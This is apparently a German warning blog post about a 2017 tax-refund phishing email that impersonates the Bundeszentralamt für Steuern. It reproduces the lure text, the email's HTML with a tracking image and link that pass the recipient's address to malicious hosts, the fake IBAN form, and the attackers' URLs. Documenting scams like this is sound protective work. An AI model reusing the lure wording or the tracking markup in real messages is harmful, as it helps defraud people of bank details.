Benachrichtigung uber Steueruckerstattung von Bundeszentralamt fur Steuern ([email protected], [email protected] oder [email protected])

Am Samstag, den 01. April 2017 wurde folgende E-Mail durch unbekannte Dritte die folgende E-Mail in deutscher Sprache versendet. Achtung: Es handelt sich um eine gefälschte E-Mail! Klicken Sie nicht auf den Link und geben Sie keine Daten ein!

Bereits in den letzten Tagen gab es sowohl die E-Mails „Benachrichtigung uber Steueruckerstattung von Bundeszentralamt fur Steuern ([email protected])“ (28.03.2017) oder „Steuerrückerstattung von Bundeszentralamt für Steuern ([email protected]) “ (27.03.2017), die nur zur Eingabe einer IBAN aufgefordert haben. Wenige Tage später gab es Phishing-Mails „Sicherheit fьr Konto DE(IBAN) von Deutsche Bank Privat und Gesch?ftskunden ([email protected])“ (30.03.2017), die sich auf die eigegebenen Daten bezogen haben.

Hier die Phishing-Mail vom 01.04.2017:

Betreff: Benachrichtigung uber Steueruckerstattung
Absender: Bundeszentralamt fur Steuern ([email protected], [email protected] oder [email protected])

Bundeszentralamt für Steuern

Nach den letzten jährlichen Berechnungen Ihrer steuerpflichtigen Aktivitäten haben wir festgestellt, dass Sie Anspruch haben auf eine Steuerruckzahlung von € 232,81.

Bitte reichen Sie die Steuerrückerstattung Anfrage ein und gewähren Sie uns 3-5 Tage fur die Verarbeitung.

Weiter

(c) Bundeszentralamt für Steuern

Die betrügerische Seite scheint die IP-Adresse des Anwenders zu protokollieren und zeigt die Grafik sowie die Phishing-Seiten nur zeitweise an. Die E-Mail sieht nach einiger Zeit vermutlich so aus:

Achtung: Es handelt sich um eine betrügerische E-Mail! Die E-Mail stammt nicht vom Bundeszentralamt für Steuern! Klicken Sie deswegen nicht auf den Link und geben Sie keine Daten ein!

Die E-Mail besteht nur aus einem Bild. Bereits beim Laden des Bildes wird Ihre E-Mail-Adresse an einen Server übermittelt, so dass die Betrüger prüfen können, ob die E-Mail-Adresse gültig ist und ob Sie die E-Mail gelesen haben:

<HTML><HEAD></HEAD>
<BODY><A href=“http://diclibiltec.hopto.org/V48cVb/9lNz2N.html?e=(E-Mail-Adresse)“><IMG src=“http://diclibiltec.hopto.org/V48cVb/1xnLKS.png?e=(E-Mail-Adresse)“> </A></BODY></HTML>

Weder das eingebettete Bild diclibiltec.hopto.org/V48cVb/1xnLKS.png?e=(E-Mail-Adresse), quweloch.myvnc.com/sXzIZ/bUbc8N.png?e=(E-Mail-Adresse) oder costdofaab.myftp.biz/raP5X/vfOCh.png?e=(E-Mail-Adresse), noch die verlinkte Adresse diclibiltec.hopto.org/V48cVb/9lNz2N.html?e=(E-Mail-Adresse), quweloch.myvnc.com/sXzIZ/dc8gmE.html?e=(E-Mail-Adresse) oder costdofaab.myftp.biz/raP5X/sHERw.html?e=(E-Mail-Adresse) gehören zu einem Bundeszentralamt für Steuern. Auch die weitergeleitete Domain aa00cbeff144daf9b.myftp.biz/TQKLoOPC/c.php?click=yes&acc=yes&data=t2qgkc0VTXS5m&e=(E-Mail-Adresse) oder aa00cbeff144daf9b.myftp.biz/l4qib23I/t2qgkc0VTXS5m/xTnHvHLKtMKWrDiVpoTcfRqrg8JD0X/do.html gehört nicht dazu!

Wenn die Seite mehrfach aufgerufen wird, scheinen die Betrüger über die IP-Adresse einen weiteren Aufruf zu verhindern. Da zuvor das Bild über die gleiche Domain geladen wird, könnte die Seite auch bei zuvor nicht geladener Grafik so aussehen:

Not Found

In den letzten Tagen waren die Phishing-Seiten dennoch aber immer wieder auch aktiv. Klicken Sie deswegen nach wie vor nicht auf den Link und geben Sie keine Daten (IBAN) ein!

Die betrügerische Seite würde Sie zur Eingabe der IBAN auffordern. Geben Sie diese nicht ein! Ihre Eingaben werden an unbekannte Dritte übermittelt!

Bundeszentralamt für Steuern – Steuerrückzahlung
Verarbeiten Ihre Steuererstattung

Der schnellste und einfachste Weg, um Ihre Rückerstattung zu erhalten, ist eine direkte Einzahlung auf Ihr persönliches Bankokonto.

Ihre Rückerstattung wird auf der Rechnung als „Bundeszentralamt für Steuern“ erscheinen.

IBAN *

* Pflichtangabe Weiter

Bitte gewähren Sie 3-5 Werktage für die Verarbeitung.

Geben Sie keine IBAN ein! Es gibt Konten, die von der betrügerischen Seite angenommen werden. Danach würde folgende Bestätigung erscheinen:

Bundeszentralamt für Steuern – Steuerrückzahlung
Verarbeiten Ihre Steuererstattung
Ihr Antrag wurde zur Überprüfung vorgelegt.

Wenn sich die Informationen als korrekt erweisen, erhalten Sie innerhalb von 3-5 Tagen Ihre Rückerstattung.

 

Die betrügerische Seite scheint übrigens nicht alle Banken zu akzeptieren. So wurden im Test sowohl Sparkassen wie auch Volksbanken abgelehnt, andere Banken wurden aber akzeptiert. Das kann sich aber jederzeit wieder ändern. Geben Sie daher keine Daten ein!

Kommentar(e)

3 Kommentare

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.